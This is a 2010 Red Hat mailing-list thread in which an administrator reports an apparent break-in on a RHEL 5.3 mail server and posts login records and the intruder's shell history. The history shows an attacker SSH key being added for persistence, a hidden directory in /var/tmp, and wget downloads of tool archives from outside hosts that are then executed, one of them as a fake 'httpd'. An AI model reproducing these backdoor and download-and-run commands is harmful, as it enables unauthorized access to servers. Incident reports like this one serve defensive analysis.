Re: help

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 



i use putty for remotely login

On Thu, Jan 28, 2010 at 11:59 AM, Joy Methew <ml4joy@xxxxxxxxx> wrote:

> still i m thinking how he/she got my password??
>
>
>
> On Thu, Jan 28, 2010 at 11:58 AM, Joy Methew <ml4joy@xxxxxxxxx> wrote:
>
>> i have changed my root password
>>
>>
>> On Thu, Jan 28, 2010 at 11:44 AM, Wahyu Darmawan <
>> Wahyu.Darmawan@xxxxxxxxx> wrote:
>>
>>> You may change your root password first, and then you can continue to
>>> analyze your system.
>>>
>>> ________________________________________
>>> From: redhat-list-bounces@xxxxxxxxxx [redhat-list-bounces@xxxxxxxxxx] On
>>> Behalf Of Joy Methew [ml4joy@xxxxxxxxx]
>>> Sent: Thursday, January 28, 2010 12:59 PM
>>> To: General Red Hat Linux discussion list
>>> Subject: help
>>>
>>> Hello all,
>>>                    i m using RHEL5.3 as a my mail server with real ip.i
>>> configure my system mostly remotely.last login time of my system 27 jan
>>> from   this ip 118.129.153.43.
>>> than i try to login at 28 jan in morning so i can`t got authentication as
>>> root from my last password.
>>> than i reboot the system reset my password.
>>> i login as a root than i run "last" command i m sending tha first 10
>>> lines
>>> of last command...i thinks someone hack my system.i am sending history
>>> command output.
>>> now i remove .ssh directory and /var/tmp/*
>>>
>>> please suggest wat is this??
>>>
>>> thanks
>>>
>>> last command out put:
>>> root     pts/1        117.199.118.234  Thu Jan 28 10:58   still logged in
>>> root     pts/0        117.199.118.234  Thu Jan 28 10:49   still logged in
>>> root     tty1                          Thu Jan 28 10:48 - 10:52  (00:04)
>>> reboot   system boot  2.6.18-128.el5PA Thu Jan 28 10:45          (00:25)
>>> root     pts/2        165.red-79-153-1 Thu Jan 28 01:42 - 01:52  (00:09)
>>> root     pts/2        165.red-79-153-1 Wed Jan 27 23:02 - 01:27  (02:25)
>>> root     pts/2        165.red-79-153-1 Wed Jan 27 22:33 - 22:34  (00:00)
>>> root     pts/3        165.red-79-153-1 Wed Jan 27 22:32 - 22:33  (00:00)
>>> root     pts/2        118.129.153.43   Wed Jan 27 22:31 - 22:32  (00:01)
>>> root     pts/2        117.199.114.189  Wed Jan 27 15:47 - 15:51  (00:03)
>>>
>>> What is 165.red-79........this is nt my ip.
>>>
>>>
>>> History Output
>>>
>>>  115  cat /proc/cpuinfo
>>>  116  mkdir .ssh
>>>  117  cd .ssh
>>>  118  echo ssh-rsa
>>>
>>> AAAAB3NzaC1yc2EAAAABJQAAAIBSUxeR1W95aH+iJwXRJaswx6YwqqZPk2BBLaGoJR5vnLARZbpMZzxfjo9wwed/FONEcnZFVo0eTkaZ+xDaC8eDvT0A4gRC2ahK7sCM17nbRvwGdXPIKismvz6Xqp7mLRf+I2jI6xKq8lba96U6uUHtbiaRi814IyJ3Q0It54KBwQ==
>>> rsa-key-20080201 >> ~/.ssh/authorized_keys; chmod 700 ~/.ssh; chmod 600
>>> ~/.ssh/authorized_keys
>>>  119  cd /var/tmp
>>>  120  mkdir " "
>>>  121  cd " "
>>>  122  passwd
>>>  123  echo ssh-rsa
>>>
>>> AAAAB3NzaC1yc2EAAAABJQAAAIBSUxeR1W95aH+iJwXRJaswx6YwqqZPk2BBLaGoJR5vnLARZbpMZzxfjo9wwed/FONEcnZFVo0eTkaZ+xDaC8eDvT0A4gRC2ahK7sCM17nbRvwGdXPIKismvz6Xqp7mLRf+I2jI6xKq8lba96U6uUHtbiaRi814IyJ3Q0It54KBwQ==
>>> rsa-key-20080201 >> ~/.ssh/authorized_keys; chmod 700 ~/.ssh; chmod 600
>>> ~/.ssh/authorized_keys
>>>  124  ps -x
>>>  125  cd /var/tmp
>>>  126  w
>>>  127  wget http://kok.ucoz.de/gosh.tgz
>>>  128  tar xvf gosh.tgz
>>>  129  cd gosh
>>>  130  chmod +x *
>>>  131  ./go.sh 121
>>>  132  w
>>>  133  ps -x
>>>  134  ps -aux
>>>  135  cd /var/tmp
>>>  136  cd " "
>>>  137  ls -a
>>>  138  wget http://helpbnc.myftp.org/danger/fld.tgz
>>>  139  tar xzvf fld.tgz
>>>  140  cd fld
>>>  141  chmod +x *
>>>  142  nano cyc.acc
>>>  143  nano cyc.acc.1
>>>  144  nano cyc.set
>>>  145  ./httpd
>>>  146  w
>>> --
>>> redhat-list mailing list
>>> unsubscribe mailto:redhat-list-request@xxxxxxxxxx?subject=unsubscribe
>>> https://www.redhat.com/mailman/listinfo/redhat-list
>>>
>>> --
>>> redhat-list mailing list
>>> unsubscribe mailto:redhat-list-request@xxxxxxxxxx?subject=unsubscribe
>>> https://www.redhat.com/mailman/listinfo/redhat-list
>>>
>>
>>
>
-- 
redhat-list mailing list
unsubscribe mailto:redhat-list-request@xxxxxxxxxx?subject=unsubscribe
https://www.redhat.com/mailman/listinfo/redhat-list

[Index of Archives]     [CentOS]     [Kernel Development]     [PAM]     [Fedora Users]     [Red Hat Development]     [Big List of Linux Books]     [Linux Admin]     [Gimp]     [Asterisk PBX]     [Yosemite News]     [Red Hat Crash Utility]


  Powered by Linux